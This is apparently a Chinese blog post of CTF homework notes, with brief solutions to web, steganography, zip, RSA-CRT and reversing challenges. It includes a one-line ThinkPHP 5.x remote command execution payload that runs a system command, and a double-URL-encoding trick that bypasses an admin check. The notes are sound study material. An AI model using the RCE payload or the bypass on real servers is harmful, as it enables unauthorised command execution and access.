1.24作业

devtools/2025/2/24 2:58:36/

1

 pdf_converter

ThinkPHP 5.x远程命令执行漏洞分析与复现 - 渗透测试中心 - 博客园

s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cat+%2Fflag

2
 

三原色值0-255(八位二进制),修改颜色码低位可隐藏信息

红绿蓝三色最低位

2、

解压遇到伪加密、crc报错的问题

修改两处0900,修改STORED("压缩方式字段,0表示未压缩,8已压缩")

3

import gmpy2
from Crypto.Util.number import long_to_bytes
p = 8637633767257008567099653486541091171320491509433615447539162437911244175885667806398411790524083553445158113502227745206205327690939504032994699902053229 
q = 12640674973996472769176047937170883420927050821480010581593137135372473880595613737337630629752577346147039284030082593490776630572584959954205336880228469 
dp = 6500795702216834621109042351193261530650043841056252930930949663358625016881832840728066026150264693076109354874099841380454881716097778307268116910582929 
dq = 783472263673553449019532580386470672380574033551303889137911760438881683674556098098256795673512201963002175438762767516968043599582527539160811120550041 
c = 24722305403887382073567316467649080662631552905960229399079107995602154418176056335800638887527614164073530437657085079676157350205351945222989351316076486573599576041978339872265925062764318536089007310270278526159678937431903862892400747915525118983959970607934142974736675784325993445942031372107342103852
I = gmpy2.invert(q,p)
m1 = pow(c,dp,p)
m2 = pow(c,dq,q)
m = (((m1-m2)*I)%p)*q+m2
print(long_to_bytes(m))

4

python">import base64def encode1(ans):s = ''for i in ans:x = ord(i) ^ 36x = x + 25s += chr(x)return sdef encode2(ans):s = ''for i in ans:x = ord(i) + 36x = x ^ 36s += chr(x)return sdef encode3(ans):return base64.b32encode(ans)flag = ' '
print 'Please Input your flag:'
flag = raw_input()
final = 'UC7KOWVXWVNKNIC2XCXKHKK2W5NLBKNOUOSK3LNNVWW3E==='
if encode3(encode2(encode1(flag))) == final:print 'correct'
else:print 'wrong'

对final进行decode3(2(1(final))):

XOR36,+25——-25,XOR36

+36,XOR36——XOR36,-36

decode

5.1

函数定义之初没有定义变量p,导致上面字符串处理的结果被储存到p中

要作用于下面的字符串就自己写:

str="55,56,54,79,115,69,114,116,107,49,50"
s=str.split(",")
a=""
for i in s:i = chr(int(i))a = a+i
print(a)

5.2

“authenticate?”

index.php能正常访问

index.phps查看源代码:经过urldecode后等于"admin"——进行两次url编码

浏览器会自动进行URL解码,%要进行编码:%25

%2561dmin

 


http://www.ppmy.cn/devtools/161275.html

相关文章

Asp.Net 前后端分离项目——项目搭建

Asp.Net 前后端分离项目——项目搭建

项目目录 MyDemoProject/ ├── BackendDemo/ # 后端项目目录 │ ├── Controllers/ # 控制器目录,存放 API 控制器 │ │ └── WeatherForecastController.cs │ ├── Models/ # 数据模型目录(…
阅读更多...
跨中心模型自适应牙齿分割|文献速递-医学影像人工智能进展

跨中心模型自适应牙齿分割|文献速递-医学影像人工智能进展

Title 题目 Cross-center Model Adaptive Tooth segmentation 跨中心模型自适应牙齿分割 01 文献速递介绍 三维(3D)口腔内扫描牙齿模型的自动、准确分割是计算机辅助正畸治疗不可或缺的先决条件。具体而言,口腔内扫描(IOS&am…
阅读更多...
Ubuntu 下 nginx-1.24.0 源码分析 - ngx_conf_full_name 函数

Ubuntu 下 nginx-1.24.0 源码分析 - ngx_conf_full_name 函数

ngx_conf_full_name 声明在 src/core/ngx_conf_file.h ngx_int_t ngx_conf_full_name(ngx_cycle_t *cycle, ngx_str_t *name,ngx_uint_t conf_prefix); 定义在 src\core\ngx_conf_file.c ngx_int_t ngx_conf_full_name(ngx_cycle_t *cycle, ngx_str_t *name, ngx_uint_t conf_…
阅读更多...
华为云ECS命名规则解析与规格选型实战指南

华为云ECS命名规则解析与规格选型实战指南

一、华为云ECS命名规则深度解析 华为云服务器ECS实例名称采用标准化编码规则,通过命名即可快速识别实例的关键参数。典型命名格式如下: [实例族][代次].[规格大小].[扩展标识] 以c6.2xlarge.4为例进行分解: 1. 实例族标识(首位…
阅读更多...
Spring MVC 框架学习笔记:从入门到精通的实战指南

Spring MVC 框架学习笔记:从入门到精通的实战指南

目录 1. Spring MVC 概述 2. Spring MVC 项目搭建 3. Spring MVC 执行流程 4. Spring MVC RequestMapping 注解 5. Spring MVC 获取请求参数 6. Spring MVC 常见注解 7. Spring MVC 响应处理 8. Spring MVC SSM 整合 9. Spring MVC 作用域传参 10. Spring MVC 上传 1…
阅读更多...
Maven 构建中的安全性与合规性检查

Maven 构建中的安全性与合规性检查

在现代软件开发中,确保应用程序的安全性和合规性至关重要。随着开源软件和第三方依赖的广泛使用,构建过程中对依赖的安全性和合规性检查变得尤为重要。通过 Maven 构建工具,我们可以集成多种安全性和合规性检查机制,帮助开发者检测…
阅读更多...
基于Python+Vue开发的商城管理系统源代码

基于Python+Vue开发的商城管理系统源代码

项目简介 该项目是基于PythonVue开发的商城管理系统(前后端分离),这是一项为大学生课程设计作业而开发的项目。该系统旨在帮助大学生学习并掌握Python编程技能,同时锻炼他们的项目设计与开发能力。通过学习基于Python的网上商城管…
阅读更多...
探索与Cursor协作创建一个完整的前后端分离的项目的最佳实践

探索与Cursor协作创建一个完整的前后端分离的项目的最佳实践

探索与Cursor协作创建一个完整的前后端分离的项目的最佳实践 Cursor简介 Cursor在目前代表了AI编程技术的顶峰。在一定程度上可以说是当今AI时代的最强生产力代表。为此,不惜重金开了年费会员来紧跟时代步伐。当然cline、roo code、trae等开源或者免费产品也在紧追不舍。 C…
阅读更多...
最新文章

Copyright @ 2022~2023